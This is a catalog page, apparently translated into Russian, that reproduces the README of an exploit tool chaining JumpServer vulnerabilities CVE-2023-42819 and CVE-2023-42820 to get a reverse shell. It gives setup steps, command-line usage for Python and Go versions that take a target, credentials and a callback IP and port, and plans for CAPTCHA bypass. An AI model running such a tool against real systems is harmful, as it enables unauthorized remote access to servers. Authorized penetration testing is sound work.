Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-42819 — CVE-2023-42819 | Kitploit
Инструменты/GitHubGitHub/c1ph3rx13/cve-2023-42819
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

Репозиторий
6372 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-42819

CVE-2023-42819

Описание уязвимости

Уязвимость произвольной записи файлов в JumpServer

CVE-2023-42819 + CVE-2023-42820 = GetShell

ИСПОЛЬЗОВАНИЕ

  1. Поместите скрипт и необходимые файлы в один каталог

  2. Убедитесь, что Google Chrome установлен, и получите его номер версии

reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. Загрузите chromedriver в соответствии с версией Google Chrome и системой, затем поместите его в webdriver

    Последняя версия: https://googlechromelabs.github.io/chrome-for-testing/

    Исторические версии: https://chromedriver.chromium.org/downloads/version-selection

    Требований много : (

  2. Прослушивайте соответствующий IP и порт, ожидайте обратную оболочку

Python Version

 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: Код предоставлен только для обучения, не используйте его в других целях

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url
  -u USERNAME, --username USERNAME
                        account username
  -p PASSWORD, --password PASSWORD
                        account password
  --ip IP               shell ip
  --port PORT           shell port
  --proxy PROXY         proxy to http://ip:port

image-1

image-1

Go Version

Сборка

go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

Запуск

.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: Код предоставлен только для обучения, не используйте его в других целях                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        Shell IP
  -p string
        Account Password
  -port string
        Shell Port
  -proxy string
        Proxy Url
  -t string
        Target Url
  -u string
        Account Username

image-1

TODO

  • Решить неэлегантный способ обхода междоменных ограничений
  • Переписать с использованием httpx
  • Добавить функцию EXP
  • Переписать с использованием go-resty
  • Обход капчи при неверном вводе пароля при входе
  • Добавить типы обратных оболочек
  • Использовать headless-режим для совместимости с Linux
  • Добавить поддержку прокси http, https, socks
  • CVE-2023-42819 + CVE-2023-42820 — GetShell одной командой
  • Флагов поставлено много, возможно, не получится завершить : (

Обслуживание

  • 2023-10-18 Добавлена автоматическая обход проверки сайта — Python Version
  • 2023-10-18 Рефакторинг клиентских функций
  • 2023-10-18 Упрощена логика выполнения
  • 2023-10-18 Linux протестирован — Go Version OK

Отказ от ответственности

  1. Данный инструмент предназначен исключительно для специалистов по тестированию на проникновение, имеющих законное разрешение, и для сетевых администраторов, выполняющих стандартные операции. Пользователи могут загружать, копировать, распространять или использовать его только при наличии достаточных законных прав и в некоммерческих целях.
  2. При использовании данного инструмента вы должны убедиться, что все ваши действия соответствуют местным законам и нормативным актам, и не использовать его для деятельности, нарушающей законодательство Китайской Народной Республики. Все авторы и участники данного инструмента не несут ответственности за любые незаконные действия, совершённые пользователями при использовании инструмента.
Скачать инструмент